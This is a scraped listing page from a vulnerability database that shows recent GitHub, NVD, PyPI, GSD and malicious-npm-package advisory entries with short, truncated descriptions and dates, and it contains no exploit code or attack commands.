Recent vulnerabilities

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Publish Date	Update Date
ghsa-79hg-x22r-q5fp (github)	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerabilit...	2025-06-27T12:31:15Z	2025-06-27T12:31:15Z
ghsa-6p5x-5h49-3fm9 (github)	Deserialization of Untrusted Data vulnerability in pep.vn WP Optimize By xTraffic allows Object I...	2025-06-27T12:31:15Z	2025-06-27T12:31:15Z
ghsa-6cr4-3hv4-9r69 (github)	Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclu...	2025-06-27T12:31:15Z	2025-06-27T12:31:15Z
ghsa-q2wp-h3p9-79gp (github)	Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in R...	2025-06-27T12:31:14Z	2025-06-27T12:31:14Z
ghsa-pvq8-vg9v-94rw (github)	In the Linux kernel, the following vulnerability has been resolved: net_sched: prio: fix a race ...	2025-06-20T12:30:53Z	2025-06-27T12:31:14Z
ghsa-m439-966f-hw28 (github)	Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclu...	2025-06-27T12:31:14Z	2025-06-27T12:31:14Z
ghsa-j9v5-5vmj-2hwp (github)	The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable...	2025-06-27T12:31:14Z	2025-06-27T12:31:14Z
ghsa-hg7v-wc77-wcrx (github)	Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclu...	2025-06-27T12:31:14Z	2025-06-27T12:31:14Z
ghsa-h6pf-98c4-4pgf (github)	Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclu...	2025-06-27T12:31:14Z	2025-06-27T12:31:14Z
ghsa-gfjv-xv9m-gwx5 (github)	A vulnerability was found in gooaclok819 sublinkX up to 1.8. It has been declared as problematic....	2025-06-26T21:31:15Z	2025-06-27T12:31:14Z
ghsa-fjf9-h526-jvwx (github)	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerabilit...	2025-06-27T12:31:14Z	2025-06-27T12:31:14Z
ghsa-8wg6-4hm6-85f2 (github)	A vulnerability was found in Kingdee Cloud-Starry-Sky Enterprise Edition 6.x/7.x/8.x/9.0. It has ...	2025-06-27T12:31:14Z	2025-06-27T12:31:14Z
ghsa-7xmp-gx67-28x6 (github)	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerabilit...	2025-06-27T12:31:14Z	2025-06-27T12:31:14Z
ghsa-73r7-73gp-j7mv (github)	Missing Authentication for Critical Function vulnerability in Mitsubishi Electric Corporation G-5...	2025-06-27T00:31:14Z	2025-06-27T12:31:14Z
ghsa-5jwj-m487-96v3 (github)	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerabilit...	2025-06-27T12:31:14Z	2025-06-27T12:31:14Z
ghsa-vp64-5qr9-m88v (github)	In the Linux kernel, the following vulnerability has been resolved: mm/huge_memory: fix derefere...	2025-05-20T18:30:56Z	2025-06-27T12:31:13Z
ghsa-v8x8-x32m-fh4m (github)	In the Linux kernel, the following vulnerability has been resolved: arm64: bpf: Only mitigate cB...	2025-05-20T18:30:56Z	2025-06-27T12:31:13Z
ghsa-mq3f-36rm-5qp5 (github)	In the Linux kernel, the following vulnerability has been resolved: eth: bnxt: fix out-of-range ...	2025-04-16T15:34:45Z	2025-06-27T12:31:13Z
ghsa-f42j-5x72-52wf (github)	In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: init wiphy_w...	2025-04-16T15:34:45Z	2025-06-27T12:31:13Z
ghsa-843p-6jf4-c3r6 (github)	In the Linux kernel, the following vulnerability has been resolved: cpufreq/amd-pstate: Add miss...	2025-04-16T15:34:46Z	2025-06-27T12:31:13Z
ghsa-76f4-m3p8-6hm8 (github)	In the Linux kernel, the following vulnerability has been resolved: arm64: errata: Add missing s...	2025-05-20T18:30:55Z	2025-06-27T12:31:13Z
ghsa-3g6h-mcpv-p279 (github)	In the Linux kernel, the following vulnerability has been resolved: arm64: bpf: Add BHB mitigati...	2025-05-20T18:30:56Z	2025-06-27T12:31:13Z
ghsa-39cv-hx7c-vjcq (github)	In the Linux kernel, the following vulnerability has been resolved: net_sched: sch_sfq: move the...	2025-05-01T15:31:42Z	2025-06-27T12:31:13Z
ghsa-2w3p-68xj-4hh5 (github)	In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: Clear affinity...	2025-04-16T15:34:46Z	2025-06-27T12:31:13Z
ghsa-vcgc-h73q-2m2p (github)	AMI’s SPx contains a vulnerability in the BMC where an Attacker may bypass authentication remotel...	2025-03-11T15:31:00Z	2025-06-27T12:31:12Z
ghsa-mr66-qfpc-4h9r (github)	In the Linux kernel, the following vulnerability has been resolved: xfs: don't walk off the end ...	2024-07-29T09:36:13Z	2025-06-27T12:31:12Z
ghsa-jc8x-x899-862j (github)	In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_socket: fix s...	2024-09-27T15:30:34Z	2025-06-27T12:31:12Z
ghsa-57vw-2f4g-pvr5 (github)	In the Linux kernel, the following vulnerability has been resolved: mm: hugetlb: independent PMD...	2025-01-15T15:31:24Z	2025-06-27T12:31:12Z
ghsa-25pp-pjqx-3f66 (github)	In the Linux kernel, the following vulnerability has been resolved: net_sched: sch_sfq: don't al...	2025-02-27T03:34:01Z	2025-06-27T12:31:12Z
ghsa-j7gw-xcvp-f76q (github)	In the Linux kernel, the following vulnerability has been resolved: NFSD: Fix ia_size underflow ...	2024-07-16T12:30:41Z	2025-06-27T12:31:11Z

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS Base Score	Description	Vendor	Product	Publish Date	Update Date
cve-2025-52816 (NVD)	CVSS-v3.1: 8.1	WordPress Zita theme <= 1.6.5 - Local File Inclusion Vulnerability	themehunk	Zita	2025-06-27T11:52:17.658Z	2025-06-27T11:52:17.658Z
cve-2025-52818 (NVD)	CVSS-v3.1: 8.2	WordPress Trusty Whistleblowing plugin <= 1.5.2 - Broken Access Control Vulnerability	Dejan Jasnic	Trusty Whistleblowing	2025-06-27T11:52:16.472Z	2025-06-27T11:52:16.472Z
cve-2025-52826 (NVD)	CVSS-v3.1: 8.8	WordPress Sala theme <= 1.1.3 - PHP Object Injection Vulnerability	uxper	Sala	2025-06-27T11:52:15.291Z	2025-06-27T11:52:15.291Z
cve-2025-52824 (NVD)	CVSS-v3.1: 8.8	WordPress Mobile DJ Manager plugin <= 1.7.6 - Privilege Escalation Vulnerability	MDJM	Mobile DJ Manager	2025-06-27T11:52:15.877Z	2025-06-27T11:52:15.877Z
cve-2025-52827 (NVD)	CVSS-v3.1: 8.8	WordPress Nuss theme <= 1.3.3 - PHP Object Injection Vulnerability	uxper	Nuss	2025-06-27T11:52:14.560Z	2025-06-27T11:52:14.560Z
cve-2025-52834 (NVD)	CVSS-v3.1: 9.3	WordPress Homey theme <= 2.4.5 - SQL Injection Vulnerability	favethemes	Homey	2025-06-27T11:52:13.285Z	2025-06-27T11:52:13.285Z
cve-2025-52829 (NVD)	CVSS-v3.1: 9.3	WordPress DirectIQ Email Marketing plugin <= 2.0 - SQL Injection Vulnerability	DirectIQ	DirectIQ Email Marketing	2025-06-27T11:52:13.952Z	2025-06-27T11:52:13.952Z
cve-2023-25998 (NVD)	CVSS-v3.1: 8.1	WordPress Samex - Clean, Minimal Shop WooCommerce WordPress Theme <= 2.6 - Local File Inclusion Vulnerability	snstheme	Samex - Clean, Minimal Shop WooCommerce WordPress Theme	2025-06-27T11:52:12.658Z	2025-06-27T11:52:12.658Z
cve-2025-23973 (NVD)	CVSS-v3.1: 7.1	WordPress SpecFit-Virtual Try On Woocommerce plugin <= 7.0.6 - Cross Site Scripting (XSS) Vulnerability	dugudlabs	SpecFit-Virtual Try On Woocommerce	2025-06-27T11:52:11.272Z	2025-06-27T11:52:11.272Z
cve-2025-23967 (NVD)	CVSS-v3.1: 9.3	WordPress GG Bought Together for WooCommerce plugin <= 1.0.2 - SQL Injection Vulnerability	wpopal	GG Bought Together for WooCommerce	2025-06-27T11:52:11.964Z	2025-06-27T11:52:11.964Z
cve-2025-49416 (NVD)	CVSS-v3.1: 8.1	WordPress FW Gallery plugin <= 8.0.0 - Local File Inclusion Vulnerability	Fastw3b LLC	FW Gallery	2025-06-27T11:52:10.067Z	2025-06-27T11:52:10.067Z
cve-2025-24760 (NVD)	CVSS-v3.1: 8.1	WordPress Sofass theme <= 1.3.4 - Local File Inclusion Vulnerability	goalthemes	Sofass	2025-06-27T11:52:10.667Z	2025-06-27T11:52:10.667Z
cve-2025-49423 (NVD)	CVSS-v3.1: 7.1	WordPress Bulk YouTube Post Creator plugin <= 1.0 - Reflected Cross Site Scripting (XSS) vulnerability	Syed Tahir Ali Jan	Bulk YouTube Post Creator	2025-06-27T11:52:09.473Z	2025-06-27T11:52:09.473Z
cve-2025-49448 (NVD)	CVSS-v3.1: 8.6	WordPress FW Food Menu plugin <= 6.0.0 - Arbitrary File Deletion Vulnerability	Fastw3b LLC	FW Food Menu	2025-06-27T11:52:08.831Z	2025-06-27T11:52:08.831Z
cve-2025-6763 (NVD)		Comet System H3531 Web-based Management Interface setupA.cfg missing authentication	Comet System Comet System Comet System Comet System Comet System Comet System Comet System Comet System Comet System Comet System	T0510 T3510 T3511 T4511 T6640 T7511 T7611 P8510 P8552 H3531	2025-06-27T11:31:06.813Z	2025-06-27T11:31:06.813Z
cve-2025-6762 (NVD)		diyhi bbs HTTP Header login getUrl server-side request forgery	diyhi	bbs	2025-06-27T11:31:05.144Z	2025-06-27T11:31:05.144Z
cve-2024-12136 (NVD)	CVSS-v3.1: 6.9	Improper Access Control in Elfatek Elektronics' ANKA JPD-00028	Elfatek Elektronics	ANKA JPD-00028	2025-03-19T08:35:14.671Z	2025-06-27T11:31:03.913Z
cve-2024-12137 (NVD)	CVSS-v3.1: 7.6	Authentication Bypass in Elfatek Elektronics' ANKA JPD-00028	Elfatek Elektronics	ANKA JPD-00028	2025-03-19T08:32:38.226Z	2025-06-27T11:30:10.384Z
cve-2024-54085 (NVD)	CVSS-v4.0: 10	Redfish Authentication Bypass	AMI	MegaRAC-SPx	2025-03-11T14:00:58.643Z	2025-06-27T11:28:17.046Z
cve-2025-6749 (NVD)		huija bicycleSharingServer AdminController.java searchAdminMessageShow sql injection	huija	bicycleSharingServer	2025-06-27T02:00:11.675Z	2025-06-27T11:20:29.850Z
cve-2025-6488 (NVD)		isMobile <= 1.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via device Parameter	jairoochoa	isMobile() Shortcode for WordPress	2025-06-27T04:25:30.231Z	2025-06-27T11:02:21.495Z
cve-2025-6669 (NVD)		gooaclok819 sublinkX jwt.go hard-coded key	gooaclok819	sublinkX	2025-06-25T22:31:07.546Z	2025-06-27T10:58:08.720Z
cve-2025-6761 (NVD)		Kingdee Cloud-Starry-Sky Enterprise Edition Freemarker Engine DynamicForm 4 Action.class plugin.buildMobilePopHtml special elements used in a template engine	Kingdee	Cloud-Starry-Sky Enterprise Edition	2025-06-27T10:31:09.400Z	2025-06-27T10:31:09.400Z
cve-2025-38083 (NVD)	N/A	net_sched: prio: fix a race in prio_tune()	Linux Linux	Linux Linux	2025-06-20T11:21:51.554Z	2025-06-27T10:21:23.980Z
cve-2025-37963 (NVD)	N/A	arm64: bpf: Only mitigate cBPF programs loaded by unprivileged users	Linux Linux	Linux Linux	2025-05-20T16:01:55.322Z	2025-06-27T10:21:22.666Z
cve-2025-37958 (NVD)	N/A	mm/huge_memory: fix dereferencing invalid pmd migration entry	Linux Linux	Linux Linux	2025-05-20T16:01:51.740Z	2025-06-27T10:21:21.641Z
cve-2025-37948 (NVD)	N/A	arm64: bpf: Add BHB mitigation to the epilogue for cBPF programs	Linux Linux	Linux Linux	2025-05-20T16:01:44.452Z	2025-06-27T10:21:20.431Z
cve-2025-37929 (NVD)	N/A	arm64: errata: Add missing sentinels to Spectre-BHB MIDR arrays	Linux Linux	Linux Linux	2025-05-20T15:21:55.253Z	2025-06-27T10:21:19.345Z
cve-2025-37752 (NVD)	N/A	net_sched: sch_sfq: move the limit validation	Linux Linux	Linux Linux	2025-05-01T12:55:57.280Z	2025-06-27T10:21:18.428Z
cve-2025-23137 (NVD)	N/A	cpufreq/amd-pstate: Add missing NULL ptr check in amd_pstate_update	Linux Linux	Linux Linux	2025-04-16T14:13:17.061Z	2025-06-27T10:21:17.423Z

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS Base Score	Description	Vendor	Product	Publish Date	Update Date
cve-2025-28956 (NVD)	CVSS-v3.1: 7.1	WordPress Backwp plugin <= 2.0.2 - Reflected Cross Site Scripting (XSS) vulnerability	wphobby	Backwp	2025-06-27T11:52:43.614Z	2025-06-27T13:00:46.321Z
cve-2025-28947 (NVD)	CVSS-v3.1: 8.1	WordPress MBStore - Digital WooCommerce WordPress Theme <= 2.3 - Local File Inclusion Vulnerability	snstheme	MBStore - Digital WooCommerce WordPress Theme	2025-06-27T11:52:44.192Z	2025-06-27T11:52:44.192Z
cve-2025-28946 (NVD)	CVSS-v3.1: 8.1	WordPress PrintXtore theme <= 1.7.5 - Local File Inclusion Vulnerability	BZOTheme	PrintXtore	2025-06-27T11:52:44.803Z	2025-06-27T11:52:44.803Z
cve-2025-27361 (NVD)	CVSS-v3.1: 7.1	WordPress Photo Express for Google plugin <= 0.3.2 - Reflected Cross Site Scripting (XSS) vulnerability	thhake	Photo Express for Google	2025-06-27T11:52:45.537Z	2025-06-27T11:52:45.537Z
cve-2025-25173 (NVD)	CVSS-v3.1: 7.1	WordPress FastBook plugin <= 1.1 - Cross Site Scripting (XSS) Vulnerability	FasterThemes	FastBook	2025-06-27T11:52:46.174Z	2025-06-27T11:52:46.174Z
cve-2025-25171 (NVD)	CVSS-v3.1: 8.8	WordPress WP SmartPay plugin <= 2.7.13 - Account Takeover vulnerability	ThemesGrove	WP SmartPay	2025-06-27T11:52:46.757Z	2025-06-27T11:52:46.757Z
cve-2025-24774 (NVD)	CVSS-v3.1: 7.1	WordPress WPCRM - CRM for Contact form CF7 & WooCommerce plugin <= 3.2.0 - Reflected Cross Site Scripting (XSS) vulnerability	mojoomla	WPCRM - CRM for Contact form CF7 & WooCommerce	2025-06-27T11:52:47.385Z	2025-06-27T11:52:47.385Z
cve-2025-24769 (NVD)	CVSS-v3.1: 8.1	WordPress Zenny theme <= 1.7.5 - Local File Inclusion Vulnerability	BZOTheme	Zenny	2025-06-27T11:52:47.973Z	2025-06-27T11:52:47.973Z
cve-2025-24765 (NVD)	CVSS-v3.1: 7.7	WordPress Image Shadow plugin <= 1.1.0 - Arbitrary File Deletion Vulnerability	RobMarsh	Image Shadow	2025-06-27T11:52:48.540Z	2025-06-27T11:52:48.540Z
cve-2025-24760 (NVD)	CVSS-v3.1: 8.1	WordPress Sofass theme <= 1.3.4 - Local File Inclusion Vulnerability	goalthemes	Sofass	2025-06-27T11:52:10.667Z	2025-06-27T11:52:10.667Z
cve-2025-23973 (NVD)	CVSS-v3.1: 7.1	WordPress SpecFit-Virtual Try On Woocommerce plugin <= 7.0.6 - Cross Site Scripting (XSS) Vulnerability	dugudlabs	SpecFit-Virtual Try On Woocommerce	2025-06-27T11:52:11.272Z	2025-06-27T11:52:11.272Z
cve-2025-23967 (NVD)	CVSS-v3.1: 9.3	WordPress GG Bought Together for WooCommerce plugin <= 1.0.2 - SQL Injection Vulnerability	wpopal	GG Bought Together for WooCommerce	2025-06-27T11:52:11.964Z	2025-06-27T11:52:11.964Z
cve-2024-54085 (NVD)	CVSS-v4.0: 10	Redfish Authentication Bypass	AMI	MegaRAC-SPx	2025-03-11T14:00:58.643Z	2025-06-27T11:28:17.046Z
cve-2024-36050 (NVD)	N/A	Nix through 2.22.1 mishandles certain usage of hash caches, which makes it easier for attackers to replace current source code with attacker-controlled source code by luring a maintainer into accepting a malicious pull request.	n/a	n/a	2024-05-18T21:24:10.412Z	2025-06-27T11:59:52.999Z
cve-2024-12137 (NVD)	CVSS-v3.1: 7.6	Authentication Bypass in Elfatek Elektronics' ANKA JPD-00028	Elfatek Elektronics	ANKA JPD-00028	2025-03-19T08:32:38.226Z	2025-06-27T11:30:10.384Z
cve-2024-12136 (NVD)	CVSS-v3.1: 6.9	Improper Access Control in Elfatek Elektronics' ANKA JPD-00028	Elfatek Elektronics	ANKA JPD-00028	2025-03-19T08:35:14.671Z	2025-06-27T11:31:03.913Z
cve-2023-25998 (NVD)	CVSS-v3.1: 8.1	WordPress Samex - Clean, Minimal Shop WooCommerce WordPress Theme <= 2.6 - Local File Inclusion Vulnerability	snstheme	Samex - Clean, Minimal Shop WooCommerce WordPress Theme	2025-06-27T11:52:12.658Z	2025-06-27T11:52:12.658Z
cve-2025-6761 (NVD)		Kingdee Cloud-Starry-Sky Enterprise Edition Freemarker Engine DynamicForm 4 Action.class plugin.buildMobilePopHtml special elements used in a template engine	Kingdee	Cloud-Starry-Sky Enterprise Edition	2025-06-27T10:31:09.400Z	2025-06-27T10:31:09.400Z
cve-2025-6669 (NVD)		gooaclok819 sublinkX jwt.go hard-coded key	gooaclok819	sublinkX	2025-06-25T22:31:07.546Z	2025-06-27T10:58:08.720Z
cve-2025-38083 (NVD)	N/A	net_sched: prio: fix a race in prio_tune()	Linux Linux	Linux Linux	2025-06-20T11:21:51.554Z	2025-06-27T10:21:23.980Z
cve-2025-37963 (NVD)	N/A	arm64: bpf: Only mitigate cBPF programs loaded by unprivileged users	Linux Linux	Linux Linux	2025-05-20T16:01:55.322Z	2025-06-27T10:21:22.666Z
cve-2025-37958 (NVD)	N/A	mm/huge_memory: fix dereferencing invalid pmd migration entry	Linux Linux	Linux Linux	2025-05-20T16:01:51.740Z	2025-06-27T10:21:21.641Z
cve-2025-37948 (NVD)	N/A	arm64: bpf: Add BHB mitigation to the epilogue for cBPF programs	Linux Linux	Linux Linux	2025-05-20T16:01:44.452Z	2025-06-27T10:21:20.431Z
cve-2025-37929 (NVD)	N/A	arm64: errata: Add missing sentinels to Spectre-BHB MIDR arrays	Linux Linux	Linux Linux	2025-05-20T15:21:55.253Z	2025-06-27T10:21:19.345Z
cve-2025-37752 (NVD)	N/A	net_sched: sch_sfq: move the limit validation	Linux Linux	Linux Linux	2025-05-01T12:55:57.280Z	2025-06-27T10:21:18.428Z
cve-2025-23137 (NVD)	N/A	cpufreq/amd-pstate: Add missing NULL ptr check in amd_pstate_update	Linux Linux	Linux Linux	2025-04-16T14:13:17.061Z	2025-06-27T10:21:17.423Z
cve-2025-22128 (NVD)	N/A	wifi: ath12k: Clear affinity hint before calling ath12k_pci_free_irq() in error path	Linux Linux	Linux Linux	2025-04-16T14:13:10.692Z	2025-06-27T10:21:16.498Z
cve-2025-22119 (NVD)	N/A	wifi: cfg80211: init wiphy_work before allocating rfkill fails	Linux Linux	Linux Linux	2025-04-16T14:13:04.639Z	2025-06-27T10:21:15.571Z
cve-2025-22112 (NVD)	N/A	eth: bnxt: fix out-of-range access of vnic_info array	Linux Linux	Linux Linux	2025-04-16T14:12:58.371Z	2025-06-27T10:21:14.615Z
cve-2024-57996 (NVD)	N/A	net_sched: sch_sfq: don't allow 1 packet limit	Linux Linux	Linux Linux	2025-02-27T02:07:16.765Z	2025-06-27T10:21:13.712Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Publish Date	Update Date
pysec-2025-17	In mlflow/mlflow version 2.18, an admin is able to create a new user account without setting a pa...	2025-03-20T10:15:54+00:00	2025-04-09T17:27:26.322333+00:00
pysec-2023-309	Path Traversal in GitHub repository mlflow/mlflow prior to 2.9.2.	2023-12-13T00:15:07+00:00	2025-04-09T17:27:26.271200+00:00
pysec-2023-308	Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.	2023-07-19T01:15:10+00:00	2025-04-09T17:27:26.223213+00:00
pysec-2025-16	LNbits is a Lightning wallet and accounts system. A Server-Side Request Forgery (SSRF) vulnerabil...	2025-04-06T20:15:15+00:00	2025-04-09T17:27:25.872691+00:00
pysec-2025-15	Flask-AppBuilder is an application development framework. Prior to 4.5.3, Flask-AppBuilder allows...	2025-03-03T16:15:41+00:00	2025-04-09T17:27:25.227116+00:00
pysec-2025-14	An issue was discovered in Django 5.1 before 5.1.8 and 5.0 before 5.0.14. The NFKC normalization ...	2025-04-02T13:15:44+00:00	2025-04-09T17:27:25.169049+00:00
pysec-2025-13	An issue was discovered in Django 5.1 before 5.1.7, 5.0 before 5.0.13, and 4.2 before 4.2.20. The...	2025-03-06T19:15:27+00:00	2025-04-09T17:27:25.095679+00:00
pysec-2022-43178	An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the cleo PyPI pac...	2022-11-09T20:15:10+00:00	2025-04-09T17:27:24.793038+00:00
pysec-2022-43177	Azure CLI is the command-line interface for Microsoft Azure. In versions previous to 2.40.0, Azur...	2022-10-25T17:15:56+00:00	2025-04-09T17:27:24.642962+00:00
pysec-2024-244	A path traversal vulnerability exists in mlflow/mlflow version 2.11.0, identified as a bypass for...	2024-05-16T09:15:14+00:00	2025-04-08T10:23:25.092581+00:00
pysec-2024-243	mlflow/mlflow is vulnerable to Local File Inclusion (LFI) due to improper parsing of URIs, allowi...	2024-04-16T00:15:12+00:00	2025-04-08T10:23:25.044416+00:00
pysec-2024-242	A Local File Inclusion (LFI) vulnerability was identified in mlflow/mlflow, specifically in versi...	2024-06-06T19:15:55+00:00	2025-04-08T10:23:24.995743+00:00
pysec-2024-241	Insufficient sanitization in MLflow leads to XSS when running a recipe that uses an untrusted dat...	2024-02-23T22:15:55+00:00	2025-04-08T10:23:24.946136+00:00
pysec-2024-240	Insufficient sanitization in MLflow leads to XSS when running an untrusted recipe. This issue le...	2024-02-23T22:15:55+00:00	2025-04-08T10:23:24.900947+00:00
pysec-2024-239	A vulnerability in mlflow/mlflow version 8.2.1 allows for remote code execution due to improper n...	2024-06-06T19:15:51+00:00	2025-04-08T10:23:24.852109+00:00
pysec-2025-12	CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Ana...	2025-01-21T15:15:13+00:00	2025-04-08T10:23:23.899726+00:00
pysec-2024-238	CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Ana...	2024-11-06T15:15:11+00:00	2025-04-08T10:23:23.857960+00:00
pysec-2025-11	A vulnerability in the `KnowledgeBaseWebReader` class of the run-llama/llama_index repository, ve...	2025-03-20T10:15:31+00:00	2025-04-01T23:22:47.294256+00:00
pysec-2025-10	A vulnerability in the `download_model` function of the onnx/onnx framework, before and including...	2025-03-20T10:15:37+00:00	2025-03-26T19:21:38.843396+00:00
pysec-2025-9	A remote code execution vulnerability exists in invoke-ai/invokeai versions 5.3.1 through 5.4.2 v...	2025-03-20T10:15:26+00:00	2025-03-20T11:21:37.872971+00:00
pysec-2025-8	The `pygments-style-solarized` project was removed from PyPI by its owner on 2021-08-26. The GitH...		2025-03-17T16:35:37+00:00
pysec-2024-237	OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up un...	2024-05-14T16:17:12+00:00	2025-03-05T17:22:29.121263+00:00
pysec-2024-236	Jupyter Server Proxy allows users to run arbitrary external processes alongside their notebook se...	2024-06-11T22:15:09+00:00	2025-02-26T23:22:41.524251+00:00
pysec-2025-7	Published in 2021, the imblog package is a Python library that scrapes data from a blog page to a...		2025-02-26T21:19:19+00:00
pysec-2025-6	Published in 2021, the colabrun package is a Python library that exfiltrates user cookies to a ha...		2025-02-26T20:59:48+00:00
pysec-2025-5	Published in 2020, the autodzee package is a Python library that bypasses Deezer API restrictions...		2025-02-26T20:57:11+00:00
pysec-2025-3	Published in 2019, the autodzee package is a Python library that bypasses Deezer API restrictions...		2025-02-26T20:54:20+00:00
pysec-2025-4	Published in 2019, the automslc package is a Python library that bypasses Deezer API restrictions...		2025-02-26T19:26:49+00:00
pysec-2024-235	With the following crawler configuration: ```python from bs4 import BeautifulSoup as Soup url =...	2024-02-26T16:27:49+00:00	2025-02-26T02:48:56.937312+00:00
pysec-2023-194	langchain_experimental 0.0.14 allows an attacker to bypass the CVE-2023-36258 fix and execute arb...	2023-10-09T20:15:00Z	2025-02-23T07:46:11Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description
gsd-2024-33851	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33850	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33849	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4295	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4294	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4293	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4292	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4291	The format of the source doesn't require a description, click on the link for more details
gsd-2023-52722	The format of the source doesn't require a description, click on the link for more details
gsd-2022-48685	The format of the source doesn't require a description, click on the link for more details
gsd-2022-48684	The format of the source doesn't require a description, click on the link for more details
gsd-2024-24777	The format of the source doesn't require a description, click on the link for more details
gsd-2024-28875	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33846	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33845	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33844	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33843	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33842	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33841	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33840	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33839	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33838	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33837	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33836	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33835	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33834	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33833	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33832	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33831	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33830	The format of the source doesn't require a description, click on the link for more details

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Publish Date	Update Date
mal-2024-8863	Malicious code in conductor-utils (npm)	2024-09-11T23:05:31Z	2024-09-11T23:05:32Z
mal-2024-8869	Malicious code in perf-tools (npm)	2024-09-11T23:05:31Z	2024-09-11T23:05:31Z
mal-2024-8867	Malicious code in node-integration-test (npm)	2024-09-11T23:05:31Z	2024-09-11T23:05:31Z
mal-2024-8864	Malicious code in create-auction-house (npm)	2024-09-11T23:05:31Z	2024-09-11T23:05:31Z
mal-2024-8861	Malicious code in cryptograph-js (npm)	2024-09-10T23:32:26Z	2024-09-10T23:32:27Z
mal-2024-8860	Malicious code in color-print12345 (npm)	2024-09-10T23:32:26Z	2024-09-10T23:32:27Z
mal-2024-8859	Malicious code in beautiful-text (npm)	2024-09-10T23:32:26Z	2024-09-10T23:32:27Z
mal-2024-8858	Malicious code in priv-pack (npm)	2024-09-10T02:29:11Z	2024-09-10T02:29:11Z
mal-2024-8850	Malicious code in azure-iothub-service-client (npm)	2024-09-09T11:07:52Z	2024-09-10T00:49:29Z
mal-2024-8848	Malicious code in balvant-chavda (npm)	2024-09-09T04:23:38Z	2024-09-10T00:49:29Z
mal-2024-8853	Malicious code in roblox-event-tracker (npm)	2024-09-09T19:07:27Z	2024-09-10T00:30:53Z
mal-2024-8852	Malicious code in roblox-badges (npm)	2024-09-09T19:10:16Z	2024-09-10T00:30:53Z
mal-2024-8851	Malicious code in core-roblox-utilities (npm)	2024-09-09T19:07:17Z	2024-09-10T00:30:53Z
mal-2024-8847	Malicious code in ethersscan-api (npm)	2024-09-07T14:05:30Z	2024-09-10T00:30:53Z
mal-2024-8846	Malicious code in eslint-scope-util (npm)	2024-09-07T14:05:30Z	2024-09-10T00:30:53Z
mal-2024-8845	Malicious code in eslint-module-conf (npm)	2024-09-07T14:05:30Z	2024-09-10T00:30:53Z
mal-2024-8821	Malicious code in apigeeclientlib (npm)	2024-09-05T23:46:23Z	2024-09-10T00:30:53Z
mal-2024-8819	Malicious code in 0g-storage-contracts (npm)	2024-09-05T17:25:55Z	2024-09-10T00:30:53Z
mal-2024-3831	Malicious code in vrt_hitlijst_generic_voting (npm)	2024-06-25T13:19:24Z	2024-09-10T00:30:53Z
mal-2024-8856	Malicious code in roblox-tracer (npm)	2024-09-10T00:01:10Z	2024-09-10T00:01:11Z
mal-2024-8857	Malicious code in ultimiort (npm)	2024-09-09T22:31:53Z	2024-09-09T22:31:53Z
mal-2024-8855	Malicious code in gapuler (npm)	2024-09-09T22:31:53Z	2024-09-09T22:31:53Z
mal-2024-8854	Malicious code in evolution-ds (npm)	2024-09-09T22:22:42Z	2024-09-09T22:22:43Z
mal-2024-8849	Malicious code in video.min (npm)	2024-09-09T05:56:27Z	2024-09-09T14:06:36Z
mal-2024-8840	Malicious code in @rev-mfe-temporary/notifications (npm)	2024-09-08T17:28:16Z	2024-09-08T17:28:16Z
mal-2024-8839	Malicious code in @pd-mfe/framework-request-context (npm)	2024-09-08T17:25:46Z	2024-09-08T17:25:46Z
mal-2024-8841	Malicious code in @sky-team/create-project-modal (npm)	2024-09-08T17:17:11Z	2024-09-08T17:17:11Z
mal-2024-8838	Malicious code in @zarafront/lib-zds (npm)	2024-09-08T17:03:36Z	2024-09-08T17:03:36Z
mal-2024-8837	Malicious code in @warnermediacode/wme-theme-gelatam (npm)	2024-09-08T16:45:46Z	2024-09-08T16:45:46Z
mal-2024-8836	Malicious code in @warnermediacode/wme-gep-modules-bundle (npm)	2024-09-08T16:44:25Z	2024-09-08T16:44:25Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Publish Date	Update Date
